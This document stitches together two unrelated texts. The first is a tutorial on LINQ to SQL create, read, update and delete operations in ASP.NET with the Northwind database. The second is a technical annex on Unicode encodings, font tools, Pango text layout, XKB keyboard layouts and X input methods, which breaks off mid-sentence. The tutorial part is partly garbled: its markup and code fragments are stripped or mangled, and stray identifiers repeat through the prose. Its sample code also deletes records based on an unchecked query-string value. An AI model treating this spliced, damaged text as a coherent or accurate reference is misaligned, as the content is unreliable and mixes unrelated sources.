data model class library into your ASP.NET web project, in order to start using its objects, you must create a new instance of the DataContext class. This class is the heart of LINQ. It is the main object through which you retrieve data from the database and submit changes back. It serves as the translator for the application request into the SQL queries. Notice the new C# syntax of the .NET Framework 3.5. With a new DataContext instance, all of the objects and methods are available for you to query. Intellisense makes it very easy to use. See the screen shot below: To get the list, simply declare a variable (using var) and set it to the query statement “from c in db.Customers select c;”. Then set the GridView’s DataSource property to the variable and call the its DataBind method. var from c in db.Customers select c;” Adding a new customer to the Northwind database is just as simple. The web form file CustomerAdd.aspx contains three TextBox controls that are used to hold the three input values: Customer ID, Company Name, and Contact Name. The C# code-behind file CustomerAdd.aspx.cs provides the LINQ syntax required to create a new record in the Customers table. NorthwindDataContext db = new NorthwindDataContext(); Customer customer = new Customer(); customer.CustomerID = txtCustomerID.Text.Trim(); customer.CompanyName = txtCompanyName.Text.Trim(); customer.ContactName = txtContactName.Text.Trim(); db.Customers.InsertOnSubmit(customer); db.SubmitChanges(); First create a new instance of the NorthwindDataContext object. Then create a new customer using the Customer object. Set the customer’s properties (CustomerID, CustomerName, and ContactName) to the TextBox controls. Then call the InsertOnSubmit method passing it the customer object as the parameter holding the data to be inserted into the database. In order for the changes to take effect, the SubmitChanges method must be called. That’s it! You don’t have to worry about database connection, writing queries, and so on. NorthwindDataContext CustomerID CustomerName ContactName InsertOnSubmit SubmitChanges Updating a customer record is very similar to adding a new record. Please refer to the CustomerEdit.aspx and CustomerEdit.aspx.cs to view the layout of the web page. //get the customer id that we want to edit from query string; string customerID = Request.QueryString["customerID"].ToString(); //Use LINQ syntax to get customerID's data to be edited NorthwindDataContext db = new NorthwindDataContext(); Customer customer = db.Customers.Single(c => c.CustomerID == customerID); //set the customer properties to the text box controls customer.CompanyName = txtCompanyName.Text; customer.ContactName = txtContactName.Text; //submit changes to take effect db.SubmitChanges(); First get the customer ID from the Http request QueryString variable. Next use a DataContext instance to return a Single record from the Customers object for that customer. Then set the values of the customer object to the TextBox control’s Text property. Finally, call the SubmitChanges method so the changes can take effect. QueryString TextBox Text Deleting a customer is very similar to updating a customer. Refer to the CustomerDelete.aspx and CustomerDelete.aspx.cs files to view the layout of the web page. string custID = ""; if (Request["CustomerID"] != null) custID = Request["CustomerID"].ToString(); if (custID.Length != 0) { NorthwindDataContext db = new NorthwindDataContext(); Customer customer = db.Customers.Single(c => c.CustomerID == custID); db.Customers.DeleteOnSubmit (customer); db.SubmitChanges (); } First get the customer ID form the Http request QueryString variable. Next use a DataContext instance to return a Single record from the Customers object for the customer. Then call the DeleteOnSubmit method of the Customers object. Finally, call the SubmitChanges method so the command can take effect. DeleteOnSubmit Displaying the supplier listing is a bit more complicated because it is going to involve displaying a GridView control as a column of another GridView control. Refer to the SupplierListing.aspx and SupplierListing.aspx.cs files to see layout of the page. A partial showing of the ASPX file is displayed below. <asp:GridView <Columns> <asp:BoundField <asp:BoundField <asp:BoundField <asp:TemplateField <ItemTemplate> <asp:GridView ID="GridView1" AutoGenerateColumns ="false" runat="server" DataSource ='<%# GetSupplierProducts ( (int)DataBinder.Eval(Container.DataItem, "SupplierID") ) %>'> <Columns> <asp:BoundField <asp:BoundField </Columns> </asp:GridView> </ItemTemplate> </asp:TemplateField> </Columns> </asp:GridView> As you can see the GridView control with ID grdSuppliers contains three BoundField columns and one TemplateField column. The TemplateFiled column is a GridView control with two columns representing the product ID and the product name. The DataSource for this GridView is set to a method called GetSupplierProducts which returns an IQueryable<Product> (a collection in the object model). The implementation method is presented below. grdSuppliers GetSupplierProducts IQueryable<Product> public IQueryable<Product> GetSupplierProducts(int supplierID) { NorthwindDataContext db = new NorthwindDataContext(); var products = from p in db.Products where p.SupplierID == supplierID select p; return (products); } This method takes an integer parameter which is the expected supplier ID. This is done using DataBinder.Eval which is an ASP.NET static method that is used to evaluate a data-binding expression at runtime. Next, the GridView control with ID grdSuppliers is populated using the following syntax: DataBinder.Eval NorthwindDataContext db = new NorthwindDataContext(); var supplier = from s in db.Suppliers select s; //set and bind LINQ source to datagrid control grdSuppliers.DataSource = supplier; grdSuppliers.DataBind(); In this article we introduced LINQ (Language Integrated Query) as an ORM (Object Relational Model). We defined it as a data access method presented as an object data model – converted from a SQL Server database. It is built-in Visual Studio 2008 and the new .NET Framework 3.5. We explained how it is used through a sample Visual Studio 2008 project solution by creating 2 projects: the data model and an ASP.NET web application. The data model provided all the functionalities that were required for the web application including Retrieving data, Adding data, Updating data, and Deleting data. And we didn’t have to write not one line of ADO.NET data access code. We also looked at some of the new C# integrated query language syntax. There is a bit of learning curve. To start using the data model we saw that it must first be referenced into a project. After that a new instance of the DataContext can be created in order to have access to all of the objects and methods available to.
https://www.codeproject.com/Articles/22552/Visual-Studio-2008-Does-ORM-with-LINQ?fid=958168&df=90&mpp=10&sort=Position&spc=None&tid=2373385
CC-MAIN-2017-51
refinedweb
2,133
58.69
I would like to store a character (in order to compare it with other characters). If I declare the variable like this : char c = 'é'; everything works well, but I get these warnings : warning: multi-character character constant [-Wmultichar] char c = 'é'; ^ ii.c:12:3: warning: overflow in implicit constant conversion [-Woverflow] char c = 'é'; I think I understand why there is these warnings, but I wonder why does it still work? And should I define it like this : int d = 'é'; although it takes more space in memory? Moreover, I also get the warning below with this declaration : warning: multi-character character constant [-Wmultichar] int d = 'é'; Do I miss something? Thanks ;) é has the Unicode code point 0xE9, the UTF-8 encoding is "\xc3\xa9". I assume your source file is encoded in UTF-8, so char c = 'é'; is (roughly) equivalent to char c = '\xc3\xa9'; How such character constants are treated is implementation-defined. For GCC:'). Hence, 'é' has the value 0xC3A9, which fits into an int (at least for 32-bit int), but not into an (8-bit) char, so the conversion to char is again implementation-defined: For conversion to a type of width N, the value is reduced modulo 2N to be within range of the type; no signal is raised. This gives (with signed char) #include <stdio.h> int main(void) { printf("%d %d\n", 'é', (char)'é'); if((char)'é' == (char)'©') puts("(char)'é' == (char)'©'"); } Output: 50089 -87 (char)'é' == (char)'©' 50089 is 0xC3A9, 87 is 0xA9. So you lose information when storing é into a char (there are characters like © which compare equal to é). You can wchar_t, an implementation-dependent wide character type which is 4 byte on Linux holding UTF-32: wchar_t c = L'é';. You can convert them to the locale-specific multibyte-encoding (probably UTF-8, but you'll need to set the locale before, see setlocale; note, that changing the locale may change the behaviour of functions like isalphaor printf) by wcrtombor use them directly and also use wide strings (use the Lprefix to get wide character string literals) const char *c = "é";or const char *c = "\u00e9";or const char *c = "\xc3\xa9;", with possibly different semantics; for C11, perhaps also look for UTF-8 string literals and the u8prefix) Note, that file streams have an orientation (cf. fwide). HTH Try using wchar_t rather than char. char is a single byte, which is appropriate for ASCII but not for multi-byte character sets such as UTF-8. Also, flag your character literal as being a wide character rather than a narrow character: #include <wchar.h> ... wchar_t c = L'é';
http://www.dlxedu.com/askdetail/3/2754d688f398f4de4608ceca53ad7a91.html
CC-MAIN-2018-39
refinedweb
446
55.58
Opaque data type to pass values of any type across boundaries. More... #include <DT_Plugin.h> Opaque data type to pass values of any type across boundaries. Definition at line 115 of file DT_Plugin.h. Create a new, empty DT_Value object. A value can be assigned to it later using the assignment operator. Definition at line 120 of file DT_Plugin.h. Create a new DT_Value from the given value. A copy of the incoming value will be stored, rather than a reference to it. Definition at line 125 of file DT_Plugin.h. Reset the DT_Value object to be empty. Definition at line 143 of file DT_Plugin.h. An explicit copy function to copy in a new DT_Value. The call is explicit, rather than using the implicit assignment operator, to avoid arbitrary copying, which can get expensive for large objects. Definition at line 139 of file DT_Plugin.h. Return a reference to the value contained within. It is important that the type matches, otherwise an exception is thrown. Definition at line 157 of file DT_Plugin.h. Assign a new value to this DT_Value. Any previous value will be destroyed, and a copy made of the incoming value. Definition at line 130 of file DT_Plugin.h.
http://www.sidefx.com/docs/hdk/class_d_t___value.html
CC-MAIN-2019-04
refinedweb
203
61.53
Odoo Help Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc. How do I use a field created in sale.order and display it stock.picking.out Could some please spell this out for me in plain English - I want to display a field from sale.order in stock.picking.out I have search for ages now and found many answers, but because my programming skills are very limited and the people who answer the questions are experts, the answers tend to leave me spinning! I have created first module - Chuffed as chips! The module allows the sales man to identify the type of packaging needed for the order).... from osv import osv, fields class sale_packaging_type_field(osv.osv): _inherit = 'sale.order' _columns = { 'sale_packaging_type': fields.selection((('our', 'Our Packaging'), ('unmark', 'Unmarked Packaging')), 'Sale Packaging Type'), } _defaults = { 'sale_packaging_type': 'a', } and xml view for sales.order <openerp> <data> <record model="ir.ui.view" id="sale_packaging_type_field"> <field name="name">sale.order.form</field> <field name="model">sale.order</field> <!-- Inherits from base.view_partner_form --> <field name="inherit_id" ref="sale.view_order_form" /> <field name="arch" type="xml"> <!-- Add the textual field after the website field --> <field name="partner_shipping_id" position="after"> <field name="sale_packaging_type" /> </field> </field> </record> </data> </openerp> This works great! :) So now I'm trying to display the field sale_packaging_type in stock.picking.out using sale_id as the link (so the store man knows how to package the order) <?xml version="1.0" encoding="UTF-8"?> <openerp> <data> <record model="ir.ui.view" id="sale_packaging_type_out_field"> <field name="name">stock.picking.out.form</field> <field name="model">stock.picking.out</field> <!-- Inherits from base.view_partner_form --> <field name="inherit_id" ref="stock.view_picking_out_form" /> <field name="arch" type="xml"> <!-- Add the textual field after the website field --> <field name="stock_journal_id" position="after"> <field name="sale_id" /> #Creates a on screen link that the store man can follow - not checked if he has perm'n yet </field> </field> </record> </data> </openerp> This works as far as displaying sale_id and creating a link Questions 1) Is there a way to display sale_packaging_type from sale.order using sale_id and only this xml - maybe something similar to what I would use in a rml report? - Yes or No please? ..... If Yes how please? - I've tried this...but doesn't work sale_id.sale_packaging_type 2) If No then do I have to create a new class and related field ? - Yes or No please? ..... If Yes I'll try to do it myself only way to learn! - I'll post my results later for marking by the community! 3) If No guidance please? You have to inherit the stock picking as well for you to do this not just the sale order class stock_move(osv.osv): _name = 'stock.move' _inherit = 'stock.move' _columns = { 'sale_packaging_type':xxxxx} stock_move() Plus you might need to create an onchange function in your stock_move as well for the field to be carried along when sale order is confirmed. You need to make your field selectable in the stock move page assuming a delivery is to be carried out for a product that was not generated from no sales order (I think). If your field is not in the stock picking, what happens to your field when one clicks create new in stock picking? this might give you error Your code has dragged up a couple more questions. You use _name as per technical memento which states it compulsory You also call the class stock_move() - which I have also seen, which if I do it crashes! Any answers? - are these related - ie it crashes because I dont name it? This is my email. dkaiyewu@fastmail.fm. send me a mail I will send you a module which might be of help. (PS no money involved) Hello, - To disply sale_packing_typein the view you have to create a relatedfield in stock.picking. In the RML report of the picking you can use [[ picking.sale_id and picking.sale_id.sale_packing_type or '']]to display your field - no relatedfield is required for RML. - Yes you need a relatedfield for views It is much easier to create 2 products, one "our" and one "unmark" for every product. This method would require little to no custom programming. If you don't like the solution of 2 products, I would suggest that you create a related field in stock.picking that looks up the sale_packaging_type and displays it at the top of the sheet. As Andreas suggested. Don't bother with stock.move unless you need to itemize the packaging for every product you are selling. Many thanks, but I only told you half the story - in trying to keep it simple I simplified the code - Our selection criteria actually has 7 options, hence the product list would grow 7 fold. But it may be an option for someone else. Half the problem is understanding which bit does what to another bit, but I guess thats part of the fun of coding. About This Community Odoo Training Center Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
https://www.odoo.com/forum/help-1/question/how-do-i-use-a-field-created-in-sale-order-and-display-it-stock-picking-out-32269
CC-MAIN-2018-13
refinedweb
863
68.06
Le samedi 21 avril 2007 à 01:00 +0200, Nicolas Mailhot a écrit : > Le vendredi 20 avril 2007 à 23:18 +0200, Martin Sourada a écrit : > > > I noticed that in inkscape you have two choices how to save an image to svg: > > "Inkscape SVG" and "Plain SVG". "Inkscape SVG" is default option whereas "Plain > > SVG" seems to be better option for previews in nautilus. So I save all my icons > > in "Plain SVG" format. Dunno however where's the difference. > > It will probably strip all non-standard elements like the attached > scriptable filter (that won't remove the svg qualifiers or recent adobe > files because as far as I can tell it's legit and tools should not choke > on it) And this one will make the svg namespace implicit when possible, making nautilus happy (nautilus is still broken though). It may complain a bit on the many interesting echo xml files but will output a sane result. -- Nicolas Mailhot Attachment: svg-cleanup.xsl Description: application/xml Attachment: signature.asc Description: Ceci est une partie de message numériquement signée
https://www.redhat.com/archives/fedora-art-list/2007-April/msg00106.html
CC-MAIN-2018-09
refinedweb
179
69.31
Foreword — Acknowledgements — Introduction — Localization Efforts in the Asia-Pacific — Recommendations — Annex A: Key Concepts — Annex B: Technical Aspects — Further Reading — Resources and Tools — Glossary — About the Authors — About APDIP — About IOSN In this annex, more technical details will be discussed. The aim is to give implementers necessary information to start localization. However, this is not intended to be a hands-on cookbook. UnicodeEdit. PlanesEdit Unicode code point is a numeric value between 0 and 10FFFF, divided into planes of 64K characters. In Unicode 4.0, allocated planes are Plane 0, 1, 2 and 14. Plane 0, ranging from 0000 to FFFF, is called Basic Multilingual Plane (BMP), which is the set of characters assigned by the previous 16-bit scheme.. There are two more reserved planes Plane 15 and Plane 16, for private use, where no code point is assigned. Basic Multilingual PlaneEdit Basic Multilingual Plane (BMP), or Plane 0, is most commonly in general documents. Code points are allocated for common characters in contemporary scripts with exactly the same set as ISO/IEC 10646-1, as summarized in Figure 2 in section ý0 Note that the code points between E000 and F900 are reserved for the vendors' private use. No character is assigned in this area. Character EncodingEdit There are several ways of encoding Unicode strings for information interchange. One may simply represent each character using a fixed size integer (called wide char), which is defined by ISO/IEC 10646 as UCS-2 and UCS-4, where 2-byte and 4-byte integers are used, respectively [1] and where UCS-2 is for BMP only. But the common practice is to encode the characters using variable-length sequences of integers called UTF-8, UTF-16 and UTF-32 for 8-bit, 16-bit and 32-bit integers, respectively. [2] There is also UTF-7 for e-mail transmissions that are 7-bit strict, but UTF-8 is safe in most cases. UTF-32Edit UTF-32 is the simplest Unicode encoding form. Each Unicode code point is represented directly by a single 32-bit unsigned integer. It is therefore, a fixed-width character encoding form. This makes UTF-32 an ideal form for APIs that pass single character values. However, it is inefficient in terms of storage for Unicode strings. UTF-16Edit UTF-16 encodes code points in the range 0000 to FFFF (i.e. BMP) as a single 16-bit unsigned integer. Code points in supplementary planes are instead represented as pairs of 16-bit unsigned integers. These pairs of code units are called surrogate pairs. The values used for the surrogate pairs are in the range D800 - DFFF, which are not assigned to any character. So, UTF-16 readers can easily distinguish between single code unit and surrogate pairs. The Unicode Standard [3] provides more details of surrogates. UTF-16 is a good choice for keeping general Unicode strings, as it is optimized for characters in BMP, which is used in 99 percent of Unicode texts. It consumes about half of the storage required by UTF-32. UTF-8Edit To meet the requirements of legacy byte-oriented ASCII-based systems, UTF-8 is defined as variablewidth encoding form that preserves ASCII compatibility. It uses one to four 8-bit code units to represent a Unicode character, depending on the code point value. The code points between 0000 and 007F are encoded in a single byte, making any ASCII string a valid UTF-8. Beyond the ASCII range of Unicode, some non-ideographic characters between 0080 and 07FF are encoded with two bytes. Then, Indic scripts and CJK ideographs between 0800 and FFFF are encoded with three bytes. Supplementary characters beyond BMP require four bytes. The Unicode Standard [4] provides more detail of UTF-8. UTF-8 is typically the preferred encoding form for the Internet. The ASCII compatibility helps a lot in migration from old systems. UTF-8 also has the advantage of being byte-serialized and friendly to C or other programming languages APIs. For example, the traditional string collation using byte-wise comparison works with UTF-8. In short, UTF-8 is the most widely adopted encoding form of Unicode. Character PropertiesEdit In addition to code points, Unicode also provides a database of character properties called the Unicode Character Database (UCD), [5] which consists of a set of files describing the following properties: - Name. - General category (classification as letters, numbers, symbols, punctuation, etc.). - Other important general characteristics (white space, dash, ideographic, alphabetic, non character, deprecated, etc.). - Character shaping (bidi category, shaping, mirroring, width, etc.). - Case (upper, lower, title, folding; both simple and full). - Numeric values and types (for digits). - Script and block. - Normalization properties (decompositions, decomposition type, canonical combining class, composition exclusions, etc.). - Age (version of the standard in which the code point was first designated). - Boundaries (grapheme cluster, word, line and sentence). - Standardized variants. The database is useful for Unicode implementation in general. It is available at the Unicode.org Web site. The Unicode Standard [6] provides more details of the database. Technical ReportsEdit In addition to the code points, encoding forms and character properties, Unicode also provides some technical reports that can serve as implementation guidelines. Some of these reports have been included as annexes to the Unicode standard, and some are published individually as Technical Standards. In Unicode 4.0, the standard annexes are: - UAX 9: The Bidirectional Algorithm - Specifications for the positioning of characters flowing from right to left, such as Arabic or Hebrew. - UAX 11: East-Asian Width - Specifications of an informative property of Unicode characters that is useful when interoperating with East-Asian Legacy character sets. - UAX 14: Line Breaking Properties - Specification of line breaking properties for Unicode characters as well as a model algorithm for determining line break opportunities. - UAX 15: Unicode Normalization Forms - Specifications for four normalized forms of Unicode text. With these forms, equivalent text (canonical or compatibility) will have identical binary representations. When implementations keep strings in a normalized form, they can be assured that equivalent strings have a unique binary representation. - UAX 24: Script Names - Assignment of script names to all Unicode code points. This information is useful in mechanisms such as regular expressions, where it produces much better results than simple matches on block names. - UAX 29: Text Boundaries - Guidelines for determining default boundaries between certain significant text elements: grapheme clusters ("user characters"), words and sentences. The individual technical standards are: - UTS 6: A Standard Compression Scheme for Unicode - Specifications of a compression scheme for Unicode and sample implementation. - UTS 10: Unicode Collation Algorithm - Specifications for how to compare two Unicode strings while conforming to the requirements of the Unicode Standard. The UCA also supplies the Default Unicode Collation Element Table (DUCET) as the data specifying the default collation order for all Unicode characters. - UTS 18: Unicode Regular Expression Guidelines - Guidelines on how to adapt regular expression engines to use Unicode. All Unicode Technical Reports are accessible from the Unicode.org web site. [7] FontsEdit Font Development ToolsEdit Some FOSS tools for developing fonts are available. Although not as many as their proprietary counterparts, they are adequate to get the job done, and are continuously being improved. Some interesting examples are: - XmBDFEd. [8] - Developed by Mark Leisher, XmBDFEd is a Motif-based tool for developing BDF fonts. It allows one to edit bit-map glyphs of a font, do some simple transformations on the glyphs, transfer information between different fonts, and so on. - FontForge (formerly PfaEdit [9] ). - Developed by George Williams, FontForge is a tool for developing outline fonts, including Postscript Type1, TrueType, and OpenType. Scanned images of letters can be imported and their outline vectors automatically traced. The splines can be edited, and transformations like skewing, scaling, rotating, thickening may be applied and much more. It provides sufficient functionalities for editing Type1 and TrueType fonts properties. OpenType tables can also be edited in its recent versions. One weak point, however, is hinting. It guarantees Type1 hints quality, but not for TrueType. - TTX/FontTools [10] - Just van Rossum's TTX/FontTools is a tool to convert OpenType and TrueType fonts to and from XML. FontTools is a library for manipulating fonts, written in Python. It supports TrueType, OpenType, AFM and, to a certain extent, Type 1 and some Mac-specific formats. It allows one to dump OpenType tables, examine and edit them with XML or plain text editor, and merge them back to the font. Font ConfigurationEdit There have been several font configuration systems available in GNU/Linux desktops. The most fundamental one is the X Window font system itself. But, due to some recent developments, another font configuration called fontconfig has been developed to serve some specific requirements of modern desktops. These two font configurations will be discussed briefly. First, however, let us briefly discuss the X Window architecture, to understand font systems. X Window [11] is a client-server system. X servers are the agents that provide service to control hardware devices, such as video cards, monitors, keyboards, mice or tablets, as well as passes. In this client-server architecture, fonts are provided on the server side. Thus, installing fonts means configuring X server by installing fonts and registering them to its font path. However, since X server is sometimes used to provide thin-client access in some deployments, where X server may run on cheap PCs booted by floppy or across network, or even from ROM, font installation on each X server is not always appropriate. Thus, font service has been delegated to a separate service called X Font Server (XFS). Another machine in the network can be dedicated for font service so that all X servers can request font information. Therefore, with this structure, an X server may be configured to manage fonts by itself or to use fonts from the font server, or both. Nevertheless, recent changes in XFree86 have addressed some requirements to manage fonts at the client side. The Xft extension provides anti-aliased glyph images by font information provided by the X client. With this, the Xft extension also provides font management functionality to X clients in its first version. This was later split from Xft2 into a separate library called fontconfig. fontconfig is a font management system independent of X, which means it can also apply to non-GUI applications such as printing services. Modern desktops, including KDE 3 and GNOME 2 have adopted fontconfig as their font management systems, and have benefited from closer integration in providing easy font installation process. Moreover, client-side fonts also allow applications to do all glyph manipulations, such as making special effects, while enjoying consistent appearance on the screen and in printed outputs. The splitting of the X client-server architecture is not standard practice on stand-alone desktops. However, it is important to always keep the split in mind, to enable particular features. Output MethodsEdit Since the usefulness of XOM is still being questioned, we shall discuss only the output methods already implemented in the two major toolkits: Pango of GTK+ and Qt. Pango Text Layout EnginesEdit Pango ['Pan' means 'all' in English and 'go' means 'language' in Japanese] [12] is a multilingual text layout engine designed for quality text typesetting. Although it is the text drawing engine of GTK+, it can also be used outside GTK+ for other purposes, such as printing. [13] This section will provide localizers with a bird's eye view of Pango. The Pango reference manual [14] should be consulted for more detail. PangoLayoutEdit At a high level, Pango provides the PangoLayout class that takes care of typesetting text in a column of given width, as well as other information necessary for editing, such as cursor positions. Its features may be summarized as follows: Paragraph Properties - ident - spacing - alignment - justification - word/character wrapping modes - tabs Text Elements - get lines and their extents - get runs and their extents - character search at (x, y) position - character logical attributes (is line break, is cursor position, etc.) - cursor movements Text Contents - plain text - markup text Middle-level ProcessingEdit Pango also provides access to some middle-level text processing functions, although most clients in general do not use them directly. To gain a brief understanding of Pango internals, some highlights are discussed here. There are three major steps for text processing in Pango: [15] - Itemize. Breaks input text into chunks (items) of consistent direction and shaping engine. This usually means chunks of text of the same language with the same font. Corresponding shaping and language engines are also associated with the items. - Break. Determines possible line, word and character breaks within the given text item. It calls the language engine of the item (or the default engine based on Unicode data if no language engine exists) to analyze the logical attributes of the characters (is-line-break, is-char-break, etc.). - Shape. Converts the text item into glyphs, with proper positioning. It calls the shaping engine of the item (or the default shaping engine that is currently suitable for European languages) to obtain a glyph string that provides the information required to render the glyphs (code point, width, offsets, etc.). Pango EnginesEdit Pango engines are implemented in loadable modules that provide entry functions for querying and creating the desired engine. During initialization, Pango queries the list of all engines installed in the memory. Then, when it itemizes input text, it also searches the list for the language and shaping engines available for the script of each item and creates them for association to the relevant text item. Pango Language EnginesEdit As discussed above, the Pango language engine is called to determine possible break positions in a text item of a certain language. It provides a method to analyze the logical attributes of every character in the text as listed in Table 3. Pango Shaping EnginesEdit As discussed above, the Pango shaping engine converts characters in a text item in a certain language into glyphs, and positions them according to the script constraints. It provides a method to convert a given text string into a sequence of glyphs information (glyph code, width and positioning) and a logical map that maps the glyphs back to character positions in the original text. With all the information provided, the text can be properly rendered on output devices, as well as accessed by the cursor despite the difference between logical and rendering order in some scripts like Indic, Hebrew and Arabic. Qt Text LayoutEdit Qt 3 text rendering is different from that of GTK+/Pango. Instead of modularizing, it handles all complex text rendering in a single class, called QComplexText, which is mostly based on the Unicode character database. This is equivalent to the default routines provided by Pango. Due to the incompleteness of the Unicode database, this class sometimes needs extra workarounds to override some values. Developers should examine this class if a script is not rendered properly. Although relying on the Unicode database appears to be a straightforward method for rendering Unicode texts, this makes the class rigid and error prone. Checking the Qt Web site regularly to find out whether there are bugs in latest versions is advisable. However, a big change has been planned for Qt 4, which is the Scribe text layout engine, similar to Pango for GTK+. Input MethodsEdit The needs of keyboard maps and input methods have been discussed on page 37. This section will further discuss how to implement them, beginning with keyboard layouts. Pages 37-38 also mentions that XIM is the current basic input method framework for X Window. Only Qt 3 relies on it, while GTK+ 2 defines its own input method framework. Both XIM and GTK+ IM are discussed here. Keyboard LayoutsEdit The first step to providing text input for a particular language is to prepare the keyboard map. X Window handles the keyboard map using the X Keyboard (XKB) extension. When you start an X server on GNU/Linux, a virtual terminal is attached to it in raw mode, so that keyboard events are sent from the kernel without any translation. The raw scan code of the key is then translated into keycode according to the keyboard model. For XFree86 on PC, the keycode map is usually "xfree86" as kept under /etc/X11/xkb/keycodes directory. The keycodes just represent the key positions in symbolic form, for further referencing. The keycode is then translated into a keyboard symbol (keysym) according to the specified layout, such as qwerty, dvorak, or a layout for a specific language, chosen from the data under /etc/X11/xkb/symbols directory. A keysym does not represent a character yet. It requires an input method to translate sequences of key events into characters, which will be described later. For XFree86, all of the above setup is done via the setxkbmap command. (Setting up values in /etc/X11/XF86Config means setting parameters for setxkbmap at initial X server startup.) There are many ways of describing the configuration, as explained in Ivan Pascal's XKB explanation. [16] The default method for XFree86 4.x is the "xfree86" rule (XKB rules are kept under /etc/X11/xkb/rules ), with additional parameters: - model - pc104, pc105, microsoft, microsoftplus, ... - mlayout - us, dk, ja, lo, th, ... - (For XFree86 4.0+, up to 64 groups can be provided as part of layout definition) - variant - (mostly for Latins) nodeadkeys - option- group switching key, swap caps, LED indicator, etc. - (See /etc/X11/xkb/rules/xfree86 for all available options.) For example: $ setxkbmap us,th -option grp:alt_shift_toggle,grp_led:scroll Sets layout using US symbols as the first group, and Thai symbols as the second group. The Alt-Shift combination is used to toggle between the two groups. Scroll Lock LED will be the group indicator, which will be on when the current group is not the first group, that is, on for Thai, off for US. You can even mix more than two languages: $ setxkbmap us,th,lo -option grp:alt_shift_toggle,grp_led:scroll This loads trilingual layout. Alt-Shift is used to rotate among the three groups; that is, Alt-RightShift chooses the next group and Alt-LeftShift chooses the previous group. Scroll Lock LED will be on when the Thai or Lao group is active. The arguments for setxkbmap can be specified in /etc/X11/XF86Config for initialization on X server startup by describing the "InputDevice" section for keyboard, for example: Section "InputDevice" Identifier "Generic Keyboard" Driver "keyboard" Option "CoreKeyboard" Option "XkbRules" "xfree86" Option "XkbModel" "microsoftplus" Option "XkbLayout" "us,th_tis" Option "XkbOptions grp:alt_shift_toggle,lv3:switch,grp_led:scroll" EndSection Notice the last four option lines. They tell setxkbmap to use "xfree86" rule, with "microsoftplus" model (with Internet keys), mixed layout of US and Thai TIS-820.2538, and some more options for group toggle key and LED indicator. The "lv3:switch" option is only for keyboard layouts that require a 3rd level of shift (that is, one more than the normal shift keys). In this case for "th_tis" in XFree86 4.4.0, this option sets RightCtrl as 3rd level of shift. Providing a Keyboard MapEdit If the keyboard map for a language is not available, one needs to prepare a new one. In XKB terms, one needs to prepare a symbols map, associating keysyms to the available keycodes. The quickest way to start is to read the available symbols files under the /etc/X11/xkb/symbols directory. In particular, the files used by default rules of XFree86 4.3.0 are under the pc/ subdirectory. Here, only one group is defined per file, unlike the old files in its parent directory, in which groups are pre-combined. This is because XFree86 4.3.0 provides a flexible method for mixing keyboard layouts. Therefore, unless you need to support the old versions of XFree86, all you need to do is to prepare a single-group symbols file under the pc/ subdirectory. Here is an excerpt from the th_tis symbols file: partial default alphanumeric_keys xkb_symbols "basic" { name[Group1]= "Thai (TIS-820.2538)"; // The Thai layout defines a second keyboard group and changes // the behavior of a few modifier keys. key <TLDE> { [ 0x1000e4f, 0x1000e5b ] }; key <AE01> { [ Thai_baht, Thai_lakkhangyao] }; key <AE02> { [ slash, Thai_leknung ] }; key <AE03> { [ minus, Thai_leksong ] }; key <AE04> { [ Thai_phosamphao, Thai_leksam ] }; ... }; Each element in the xkb_symbols data, except the first one, is the association of keysyms to the keycode for unshift and shift versions, respectively. Here, some keysyms are predefined in Xlib. You can find the complete list in <X11/keysymdef.h>. If the keysyms for a language are not defined there, the Unicode keysyms, can be used, as shown in the <TLDE> key entry. (In fact, this may be a more effective way for adding new keysyms.) The Unicode value must be prefixed with "0x100" to describe the keysym for a single character. For more details of the file format, see Ivan Pascal's XKB explanation. [17] When finished, the symbols.dir file should be regenerated so that the symbols file is listed: # cd /etc/X11/xkb/symbols # xkbcomp -lhlpR '*' -o ../symbols.dir Then, the new layout may be tested as described in the previous section. Additionally, entries may be added to /etc/X11/xkbcomp/rules/xfree86.lst so that some GUI keyboard configuration tools can see the layout. Once the new keyboard map is completed, it may also be included in XFree86 source where the data for XKB are kept under the xc/programs/xkbcomp subdirectory. XIM - X Input MethodEdit For some languages, text input is as straightforward as one-to-one mapping from keysyms to characters, such as English. For European languages, this is a little more complicated because of accents. But for Chinese, Japanese and Korean (CJK), the one-to-one mapping is impossible. They require a series of keystroke interpretations to obtain each character. X Input Method (XIM) is a locale-based framework designed to address the requirements of text input for any language. It is a separate service for handling input events as requested by X clients. Any text entry in X clients is represented by X Input Context (XIC). All the keyboard events will be propagated to the XIM, which determines the appropriate action for the events based on the current state of the XIC, and passes back the resulting characters. Internally, a common process of every XIM is to translate keyboard scan code into keycode and then to keysym, by calling XKB, whose process detail has been described in previous sections. The following processes to convert keysyms into characters are different for different locales. In general cases, XIM is usually implemented using the client-server model. More detailed discussion of XIM implementation is beyond the scope of this document. Please see Section 13.5 of the Xlib document [18] and the XIM protocol [19] for more information. In general, users can choose their favourite XIM server by setting the system environment XMODIFIERS, like this: $ export LANG=th_TH.TIS-620 $ export XMODIFIERS="@im=Strict" This specifies Strict input method for Thai locale. GTK+ IMEdit As a cross-platform toolkit, GTK+ 2 defines its own framework using pure GTK+ APIs, instead of relying on the input methods of each operating system. This provides high-level of abstraction, making input methods development a lot easier than writing XIM servers. In any case, GTK+ can still use the several existing XIM servers through the imxim bridging module. Besides, the input methods developed become immediately available to GTK+ in all platforms it supports, including XFree86, Windows, and GNU/Linux framebuffer console. The only drawback is that the input methods cannot be shared with non-GTK+ applications. Client SideEdit A normal GTK+-based text entry widget will provide an "Input Methods" context menu that can be opened by right clicking within the text area. This menu provides the list of all installed GTK+ IM modules, which the user can choose from. The menu is initialized by querying all installed modules for the engines they provide. From the client's point of view, each text entry is represented by an IM context, which communicates with the IM module after every key press event by calling a key filter function provided by the module. This allows the IM to intercept the key presses and translate them into characters. Non-character keys, such as function keys or control keys, are not usually intercepted. This allows the client to handle special keys, such as shortcuts. There are also interfaces for the other direction. The IM can also call the client for some actions by emitting GLib signals, for which the handlers may be provided by the client by connecting callbacks to the signals: - "preedit_changed" - Uncommitted (pre-edit) string is changed. The client may update the display, but not the input buffer, to let the user see the keystrokes. - "commit" - Some characters are committed from the IM. The committed string is also passed so that the client can take it into its input buffer. - "retrieve_surrounding" - The IM wants to retrieve some text around the cursor. - "delete_surrounding" - The IM wants to delete the text around the cursor. The client should delete the text portion around the cursor as requested. IM ModulesEdit GTK+ input methods are implemented using loadable modules that provide entry functions for querying and creating the desired IM context. These are used as interface with the "Input Methods" context menu in text entry areas. The IM module defines a new IM context class or classes and provides filter functions to 